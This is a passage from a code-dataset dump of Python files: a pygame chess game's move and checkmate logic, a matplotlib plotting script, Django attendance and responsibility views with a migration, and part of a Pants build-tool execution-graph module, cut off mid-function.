"django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "95073183", "text": "import pygame \nimport sys\nimport copy\nfrom Board.board import Board\nfrom Board.tile import Tile\nfrom Pieces.NullPiece import NullPiece\nfrom image import Image\n\nimport bot\n\ndef check_events(screen,board):\n mx = 0\n my = 0\n for event in pygame.event.get():\n if event.type == pygame.QUIT :\n board.end_game = True\n # or event.key == pygame.K_ESCAPE :\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN and board.selectedStartTile.tileCoordinate == []:\n board.mx,board.my = pygame.mouse.get_pos()\n for i in range(8):\n for j in range(8):\n if board.gameTiles[i][j].pos[0]\")\n print(board.legalMoves)\n print(\"available moves : \",end=\"\")\n for key, value in board.default.items():\n for move in board.legalMoves:\n if(move == value):\n print(key,end = \" \")\n print(\"\\n\",end = \"\")\n elif (board.selectedStartTile.pieceOnTile.symbol != \" \" and \\\n board.selectedStartTile.pieceOnTile.alliance != board.turn) or\\\n board.selectedStartTile.pieceOnTile.symbol == \" \":\n board.selectedStartTile = Tile([],NullPiece([]))\n else :\n board.selectedStartTile = Tile([],NullPiece([]))\n updateScreen(screen,board)\n # pygame.display.flip()\n # print(\"vao day\")\n elif event.type == pygame.MOUSEBUTTONDOWN and board.selectedStartTile.tileCoordinate\\\n != [] :\n if len(board.legalMoves)>0:\n board.mx, board.my = pygame.mouse.get_pos()\n for i in range(8):\n for j in range(8):\n if board.gameTiles[i][j].pos[0]\"+str(move))\n board.whiteKing[0].check = True\n return True\n board.whiteKing[0].check = False \n return False\ndef blackKingCheck(board):\n kingPosition(board)\n\n for piece in board.pieces:\n if piece[0].symbol() != \"k\" and piece[0].alliance != -1:\n moves = piece[0].availableMoves(board)\n # print(\"test\")\n # print(moves)\n # print(piece[0].symbol())\n # if len(moves) != 0:\n for move in moves : \n if move == board.blackKing[1] :\n # print(\"test black king check\"+piece[0].symbol()+\"->\"+str(move))\n board.blackKing[0].check = True\n return True\n board.blackKing[0].check = False\n return False\ndef checkLegal(board):\n temp = Board()\n # print(\"legal move \")\n delete = []\n if board.turn == 1 :\n for move in board.legalMoves :\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move :\n temp.updateMove(temp.start, x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if whiteKingCheck(temp) == True :\n delete.append(move)\n elif board.turn == -1 :\n for move in board.legalMoves :\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move :\n temp.updateMove(temp.start, x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if blackKingCheck(temp) == True :\n delete.append(move)\n for move in delete:\n board.legalMoves.remove(move)\n # print(board.legalMoves)\ndef checkMate(board):\n temp = Board()\n count = 0\n if board.turn == 1 and whiteKingCheck(board) == True:\n for piece in board.pieces:\n if piece[0].alliance == 1:\n board.legalMoves = piece[0].availableMoves(board)\n for x, y in board.default.items():\n if y == piece[0].position:\n board.start = x\n checkLegal(board)\n count += len(board.legalMoves)\n for move in board.legalMoves:\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move:\n temp.updateMove(temp.start,x)\n temp.updatePieceForCheck()\n if whiteKingCheck(temp) == True : \n print(\"Checkmate! Black wins the game\")\n return True\n else:\n return False \n if count == 0 :\n print(\"Checkmate! Black wins the game\")\n return True\n if board.turn == -1 and blackKingCheck(board) == True:\n for piece in board.pieces:\n if piece[0].alliance == -1:\n board.legalMoves = piece[0].availableMoves(board)\n for x, y in board.default.items():\n if y == piece[0].position:\n board.start = x\n checkLegal(board)\n count += len(board.legalMoves)\n for move in board.legalMoves:\n temp = copy.deepcopy(board)\n for x,y in temp.default.items():\n if y == move:\n temp.updateMove(temp.start,x)\n # temp.printBoard()\n temp.updatePieceForCheck()\n if blackKingCheck(temp) == True : \n print(\"Checkmate! White wins the game\")\n return True\n else:\n return False \n if count == 0 :\n print(\"Checkmate! White wins the game\")\n return True\ndef checkStalemate(board):\n temp = Board()\n count = 0\n if board.turn == 1 and whiteKingCheck(board) == False:\n for piece in board.pieces:\n if piece[0].alliance == 1:\n board.legalMoves = piece[0].availableMoves(board)\n checkLegal(board)\n count += len(board.legalMoves)\n if count != 0 :\n return False\n if count == 0 :\n print(\"Stalemate! White turn\")\n return True\n if board.turn == -1 and blackKingCheck(board) == False:\n for piece in board.pieces:\n if piece[0].alliance == -1:\n board.legalMoves = piece[0].availableMoves(board)\n checkLegal(board)\n count += len(board.legalMoves)\n if count != 0 :\n return False\n if count == 0 :\n print(\"Stalemate! Black turn\")\n return True\n#=============================UPDATE SCREEN==================================\ndef squares(screen,x,y,w,h,color):\n pygame.draw.rect(screen, color, [x,y,w,h])\n\ndef drawChess(screen,board):\n xpos = 0\n ypos = 0\n color = 0\n width = 60\n height = 60\n # black = (60,134,244)\n black = (128,128,128)\n # white = (143,155,175)\n white = (255,153,153)\n orange = (255,165,0)\n pieces = []\n for i in range(8):\n for j in range(8):\n board.gameTiles[i][j].pos.append(xpos)\n board.gameTiles[i][j].pos.append(ypos)\n if color % 2 == 0 :\n if board.selectedStartTile.tileCoordinate == [i,j] or ([i,j] in board.legalMoves == True):\n squares(screen,xpos,ypos,width,height,orange)\n else:\n squares(screen,xpos,ypos,width,height,white)\n if board.gameTiles[i][j].pieceOnTile.symbol() != \" \":\n pieces.append([board.gameTiles[i][j].pieceOnTile,[xpos,ypos]])\n xpos += 60\n else :\n if board.selectedStartTile.tileCoordinate == [i,j] or ([i,j] in board.legalMoves == True):\n squares(screen,xpos,ypos,width,height,orange)\n else:\n squares(screen,xpos,ypos,width,height,black)\n if board.gameTiles[i][j].pieceOnTile.symbol() != \" \":\n pieces.append([board.gameTiles[i][j].pieceOnTile,[xpos,ypos]])\n xpos += 60\n color += 1\n color += 1\n xpos = 0\n ypos += 60\n return pieces\n\ndef updateScreen(screen,board):\n board.pieces = drawChess(screen,board)\n temp = Image()\n array = []\n for piece in board.pieces:\n array.append([temp.getImage(piece[0].symbol()),piece[1]])\n for img in array:\n screen.blit(img[0],img[1])\n\n # for img in board.pieces:\n # screen.blit(img[0].image,img[1])\n\n\n#============================MOVE=============================================\ndef getAvailableMove(board,position):\n kingPosition(board)\n if board.gameTiles[position[0]][position[1]].pieceOnTile.symbol != \" \":\n moves = board.gameTiles[position[0]][position[1]].pieceOnTile.availableMoves(board)\n return moves\n else :\n print(\"Null Piece\")\n return\n\ndef getMove(board):\n print(\"GET PLAYER MOVE : \")\n print(\"start : \")\n start = input()\n if board.gameTiles[board.default[start][0]][board.default[start][1]].pieceOnTile.symbol() == \" \":\n print(\"Null Piece\")\n return 9,9\n moves = getAvailableMove(board,board.default[start])\n print(moves)\n print(\"available moves : \",end='')\n for move in moves : \n for key, value in board.default.items():\n if move == value:\n print(key,end =' ')\n print(\"\",end = '\\n')\n print(\"end : \")\n end = input()\n for move in moves : \n if board.default[end] == move and start != end:\n return start, end\n print(\"inValid Move\")\n return 9,9\n\n\n", "sub_path": "settings.py", "file_name": "settings.py", "file_ext": "py", "file_size_in_byte": 13776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygame.event.get", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 20, "usage_type": "attribute"}, {"api_name": "Board.tile.Tile", "line_number": 47, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 47, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 49, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 56, "usage_type": "attribute"}, {"api_name": "Board.tile.Tile", "line_number": 75, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 75, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 76, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 76, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 81, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 81, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 82, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 82, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 86, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 86, "usage_type": "call"}, {"api_name": "Board.tile.Tile", "line_number": 87, "usage_type": "call"}, {"api_name": "Pieces.NullPiece.NullPiece", "line_number": 87, "usage_type": "call"}, {"api_name": "bot.evaluate", "line_number": 102, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 147, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 152, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 162, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 174, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 186, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 209, "usage_type": "call"}, {"api_name": "Board.board.Board", "line_number": 224, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 250, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 250, "usage_type": "attribute"}, {"api_name": "image.Image", "line_number": 292, "usage_type": "call"}]} +{"seq_id": "134917451", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 29 20:10:31 2019\n\n@author: evan9\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('THfinish_edited.csv')\nx = data.iloc[:, 0]\ny = data.iloc[:, 1]\n\nfig = plt.figure(figsize=(10,6))\naxes = fig.add_axes([0.1, 0.1, 0.8, 0.8])\naxes.plot(x, y, color='blue', lw=0, marker='o', markersize=8)\naxes.set_ylim([0, 3])\naxes.axvline(x=0.580, color='black', ls='--')\naxes.axvline(x=0.924, color='black', ls='--')\naxes.axhline(y=2.070, color='red', ls='--')\n\naxes.set_xlabel('Stimulus intensity (mV)', fontsize=16)\naxes.set_ylabel('Response (mV)', fontsize=16)\naxes.set_title('Threshold & MSI', fontsize=24)\n\nplt.show()\n#fig.savefig('Threshold MSI2.png', dpi=200)\n\n\n", "sub_path": "2a AnimalLab/1.CAP/Threshold MSI Plot.py", "file_name": "Threshold MSI Plot.py", "file_ext": "py", "file_size_in_byte": 724, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "102304568", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom datetime import date, datetime\n\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import View, CreateView, UpdateView, DeleteView, ListView, DetailView\nfrom clubManagement.models import Attendance, Responsibility\nfrom registration.models import UserInfo\n\nmonth = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\",\n \"October\", \"November\", \"December\"]\n\nmonth_num = range(12)\n\n\ndef calculate_year(year):\n year = datetime.now().year - year\n if datetime.now().month > 5:\n year += 1\n print(year)\n if year == 1:\n return '1st year'\n elif year == 2:\n return '2nd year'\n elif year == 3:\n return '3rd year'\n elif year == 4:\n return '4th year'\n else:\n return 'Alumni - ' + str(year + datetime.now().year) + ' batch'\n\n\ndef get_batch_list(kwargs):\n batches = []\n if 'batch' in kwargs:\n batches += [int(kwargs.get('batch'))]\n else:\n year = datetime.now().year\n if datetime.now().month < 5:\n year -= 1\n for i in range(4):\n batches += [year - i]\n print(batches)\n return batches\n\n\nclass AttendanceAddView(View):\n template_name = 'clubManagement/attendance_add.html'\n\n def get(self, request, **kwargs):\n \"\"\"\n A view for an admin to add attendance for a particular date.\n url = /batch/year/month/day/\n or\n url = /year/month/day (display 1st - 4th year)\n date is calculated from (year, month, day)\n and students is selected according to batch\n\n attendance_list = [ [ '1st_year', list_of_1st_years ], ..... ]\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('permission_denied')\n\n d = date(int(kwargs.get('year')), int(kwargs.get('month')), int(kwargs.get('day')))\n context = {}\n batch_list = get_batch_list(kwargs)\n\n attendance_list = []\n\n for batch in batch_list:\n user_info_list = UserInfo.objects.filter(year=batch)\n # display the current attendance for this date and batch\n attendance_list_batch = []\n for user_info in user_info_list:\n try:\n attendance = Attendance.objects.get(user=user_info.user, date=d)\n except Attendance.DoesNotExist:\n attendance = Attendance(user=user_info.user,\n added_by=User.objects.get(username=self.request.user.username), date=d)\n attendance.save()\n attendance_list_batch.append(attendance)\n\n # attendance list contains all the Attendance objects of the batch with date = d\n year = calculate_year(batch)\n attendance_list += [[attendance_list_batch, year], ]\n\n context = {'attendance_list': attendance_list}\n print(context)\n return render(request, self.template_name, context)\n\n def post(self, request, **kwargs):\n if not request.user.is_superuser:\n return redirect('permission_denied')\n\n d = date(int(kwargs.get('year')), int(kwargs.get('month')), int(kwargs.get('day')))\n\n if 'batch' in kwargs:\n user_info_list = UserInfo.objects.filter(year=int(kwargs.get('batch')))\n for user_info in user_info_list:\n attendance_list = user_info.user.attendance_set.filter(date=d)\n for i in attendance_list:\n i.attendance = False\n i.save()\n else:\n # make all attendance false and make attendance = true for users in request.POST.\n attendance_list = Attendance.objects.filter(date=d)\n for i in attendance_list:\n i.attendance = False\n i.save()\n\n for key in request.POST:\n try:\n user = User.objects.get(username=key)\n except User.DoesNotExist:\n user = None\n if user:\n att = Attendance.objects.get(user=user, date=d)\n att.attendance = True\n att.save()\n if 'batch' in kwargs:\n return redirect('add_attendance_batch', **kwargs)\n else:\n return redirect('add_attendance_all', **kwargs)\n\n\nclass YearStudentAttendanceReportView(View):\n template_name = 'clubManagement/attendance_yearly.html'\n\n def get(self, request, **kwargs):\n user = User.objects.get(id=int(kwargs.get('user_id')))\n att = user.attendance_set.filter(date__year=int(kwargs.get('year')))\n if len(att) > 0:\n month_att = []\n for i in month_num:\n month_att.append(len(att.filter(date__month=(i + 1))))\n context = {'user': user, 'month_att': month_att, 'month': month, 'month_num': month_num,\n 'year': kwargs.get('year')}\n else:\n context = {'errors', 'No records found'}\n return render(request, self.template_name, context)\n\n\nclass YearAttendanceReportView(View):\n \"\"\"\n context = {'data_list': data_list}\n where:\n data_list = [ [user_data, year, error], ....]\n user_data = [[user, month_att, total_att], ......]\n month_att = list of attendance for 12 months\n \"\"\"\n template_name = 'clubManagement/attendance_batch_yearly.html'\n\n def get(self, request, **kwargs):\n batch_list = get_batch_list(kwargs)\n data_list = []\n for batch in batch_list:\n user_info_list = UserInfo.objects.filter(year=batch)\n user_data = []\n for user_info in user_info_list:\n month_att = []\n total_att = 0\n for i in month_num:\n att_month = len(\n user_info.user.attendance_set.filter(\n date__year=int(kwargs.get('year')),\n date__month=(i + 1),\n attendance=True\n )\n )\n total_att += att_month\n month_att.append(att_month)\n user_data.append([user_info.user, month_att, total_att])\n year = calculate_year(batch)\n if len(user_data) > 0:\n data_list.append([user_data, year, ''])\n else:\n data_list.append([user_data, year, 'No record found'])\n context = {'data_list': data_list}\n return render(request, self.template_name, context)\n\n\n# Responsibilities\n# CreateView and UpdateView calls get_absolute_url() on the model to get the success_url\nclass ResponsibilityListView(ListView):\n model = Responsibility\n\n\nclass ResponsibilityDetailView(DetailView):\n model = Responsibility\n\n\nclass ResponsibilityCreateView(CreateView):\n model = Responsibility\n fields = ['created_by', 'name', 'description']\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super(ResponsibilityCreateView, self).form_valid(form)\n\n\nclass ResponsibilityUpdateView(UpdateView):\n model = Responsibility\n fields = ['name', 'description']\n\n\nclass ResponsibilityDeleteView(DeleteView):\n model = Responsibility\n success_url = reverse_lazy('responsibility')\n", "sub_path": "clubManagement/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.datetime.now", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 41, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "name"}, {"api_name": "django.views.generic.View", "line_number": 50, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 67, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 74, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.get", "line_number": 79, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 79, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.DoesNotExist", "line_number": 80, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 80, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance", "line_number": 81, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 96, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 101, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.filter", "line_number": 109, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 109, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 116, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.DoesNotExist", "line_number": 117, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 117, "usage_type": "name"}, {"api_name": "clubManagement.models.Attendance.objects.get", "line_number": 120, "usage_type": "call"}, {"api_name": "clubManagement.models.Attendance.objects", "line_number": 120, "usage_type": "attribute"}, {"api_name": "clubManagement.models.Attendance", "line_number": 120, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 124, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 126, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 129, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 133, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 133, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 143, "usage_type": "call"}, {"api_name": "django.views.generic.View", "line_number": 146, "usage_type": "name"}, {"api_name": "registration.models.UserInfo.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "registration.models.UserInfo.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "registration.models.UserInfo", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 182, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 187, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 188, "usage_type": "name"}, {"api_name": "django.views.generic.DetailView", "line_number": 191, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 192, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 195, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 196, "usage_type": "name"}, {"api_name": "django.views.generic.UpdateView", "line_number": 204, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 205, "usage_type": "name"}, {"api_name": "django.views.generic.DeleteView", "line_number": 209, "usage_type": "name"}, {"api_name": "clubManagement.models.Responsibility", "line_number": 210, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "247217343", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('minions', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='paperwork',\n name='emp_docs',\n field=models.CharField(blank=True, max_length=3, null=True, verbose_name=b'IDs Received?', choices=[(b'yes', b'yes'), (b'no', b'no')]),\n preserve_default=True,\n ),\n ]\n", "sub_path": "minions/migrations/0002_paperwork_emp_docs.py", "file_name": "0002_paperwork_emp_docs.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "171076035", "text": "# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport Queue as queue\nimport threading\nimport traceback\nfrom collections import defaultdict, deque\nfrom heapq import heappop, heappush\n\nfrom pants.base.worker_pool import Work\n\n\nclass Job(object):\n \"\"\"A unit of scheduling for the ExecutionGraph.\n\n The ExecutionGraph represents a DAG of dependent work. A Job a node in the graph along with the\n keys of its dependent jobs.\n \"\"\"\n\n def __init__(self, key, fn, dependencies, size=0, on_success=None, on_failure=None):\n \"\"\"\n\n :param key: Key used to reference and look up jobs\n :param fn callable: The work to perform\n :param dependencies: List of keys for dependent jobs\n :param size: Estimated job size used for prioritization\n :param on_success: Zero parameter callback to run if job completes successfully. Run on main\n thread.\n :param on_failure: Zero parameter callback to run if job completes successfully. Run on main\n thread.\"\"\"\n self.key = key\n self.fn = fn\n self.dependencies = dependencies\n self.size = size\n self.on_success = on_success\n self.on_failure = on_failure\n\n def __call__(self):\n self.fn()\n\n def run_success_callback(self):\n if self.on_success:\n self.on_success()\n\n def run_failure_callback(self):\n if self.on_failure:\n self.on_failure()\n\n\nUNSTARTED = 'Unstarted'\nQUEUED = 'Queued'\nSUCCESSFUL = 'Successful'\nFAILED = 'Failed'\nCANCELED = 'Canceled'\n\n\nclass StatusTable(object):\n DONE_STATES = {SUCCESSFUL, FAILED, CANCELED}\n\n def __init__(self, keys, pending_dependencies_count):\n self._statuses = {key: UNSTARTED for key in keys}\n self._pending_dependencies_count = pending_dependencies_count\n\n def mark_as(self, state, key):\n self._statuses[key] = state\n\n def mark_queued(self, key):\n self.mark_as(QUEUED, key)\n\n def unfinished_items(self):\n \"\"\"Returns a list of (name, status) tuples, only including entries marked as unfinished.\"\"\"\n return [(key, stat) for key, stat in self._statuses.items() if stat not in self.DONE_STATES]\n\n def failed_keys(self):\n return [key for key, stat in self._statuses.items() if stat == FAILED]\n\n def is_unstarted(self, key):\n return self._statuses.get(key) is UNSTARTED\n\n def mark_one_successful_dependency(self, key):\n self._pending_dependencies_count[key] -= 1\n\n def is_ready_to_submit(self, key):\n return self.is_unstarted(key) and self._pending_dependencies_count[key] == 0\n\n def are_all_done(self):\n return all(s in self.DONE_STATES for s in self._statuses.values())\n\n def has_failures(self):\n return any(stat is FAILED for stat in self._statuses.values())\n\n\nclass ExecutionFailure(Exception):\n \"\"\"Raised when work units fail during execution\"\"\"\n\n def __init__(self, message, cause=None):\n if cause:\n message = \"{}: {}\".format(message, str(cause))\n super(ExecutionFailure, self).__init__(message)\n self.cause = cause\n\n\nclass UnexecutableGraphError(Exception):\n \"\"\"Base exception class for errors that make an ExecutionGraph not executable\"\"\"\n\n def __init__(self, msg):\n super(UnexecutableGraphError, self).__init__(\"Unexecutable graph: {}\".format(msg))\n\n\nclass NoRootJobError(UnexecutableGraphError):\n def __init__(self):\n super(NoRootJobError, self).__init__(\n \"All scheduled jobs have dependencies. There must be a circular dependency.\")\n\n\nclass UnknownJobError(UnexecutableGraphError):\n def __init__(self, undefined_dependencies):\n super(UnknownJobError, self).__init__(\"Undefined dependencies {}\"\n .format(\", \".join(map(repr, undefined_dependencies))))\n\n\nclass JobExistsError(UnexecutableGraphError):\n def __init__(self, key):\n super(JobExistsError, self).__init__(\"Job already scheduled {!r}\"\n .format(key))\n\n\nclass ThreadSafeCounter(object):\n def __init__(self):\n self.lock = threading.Lock()\n self._counter = 0\n\n def get(self):\n with self.lock:\n return self._counter\n\n def increment(self):\n with self.lock:\n self._counter += 1\n\n def decrement(self):\n with self.lock:\n self._counter -= 1\n\n\nclass ExecutionGraph(object):\n \"\"\"A directed acyclic graph of work to execute.\n\n This is currently only used within jvm compile, but the intent is to unify it with the future\n global execution graph.\n \"\"\"\n\n def __init__(self, job_list):\n \"\"\"\n\n :param job_list Job: list of Jobs to schedule and run.\n \"\"\"\n self._dependencies = defaultdict(list)\n self._dependees = defaultdict(list)\n self._jobs = {}\n self._job_keys_as_scheduled = []\n self._job_keys_with_no_dependencies = []\n\n for job in job_list:\n self._schedule(job)\n\n unscheduled_dependencies = set(self._dependees.keys()) - set(self._job_keys_as_scheduled)\n if unscheduled_dependencies:\n raise UnknownJobError(unscheduled_dependencies)\n\n if len(self._job_keys_with_no_dependencies) == 0:\n raise NoRootJobError()\n\n self._job_priority = self._compute_job_priorities(job_list)\n\n def format_dependee_graph(self):\n return \"\\n\".join([\n \"{} -> {{\\n {}\\n}}\".format(key, ',\\n '.join(self._dependees[key]))\n for key in self._job_keys_as_scheduled\n ])\n\n def _schedule(self, job):\n key = job.key\n dependency_keys = job.dependencies\n self._job_keys_as_scheduled.append(key)\n if key in self._jobs:\n raise JobExistsError(key)\n self._jobs[key] = job\n\n if len(dependency_keys) == 0:\n self._job_keys_with_no_dependencies.append(key)\n\n self._dependencies[key] = dependency_keys\n for dependency_key in dependency_keys:\n self._dependees[dependency_key].append(key)\n\n def _compute_job_priorities(self, job_list):\n \"\"\"Walks the dependency graph breadth-first, starting from the most dependent tasks,\n and computes the job priority as the sum of the jobs sizes along the critical path.\"\"\"\n\n job_size = {job.key: job.size for job in job_list}\n job_priority = defaultdict(int)\n\n bfs_queue = deque()\n for job in job_list:\n if len(self._dependees[job.key]) == 0:\n job_priority[job.key] = job_size[job.key]\n bfs_queue.append(job.key)\n\n satisfied_dependees_count = defaultdict(int)\n while len(bfs_queue) > 0:\n 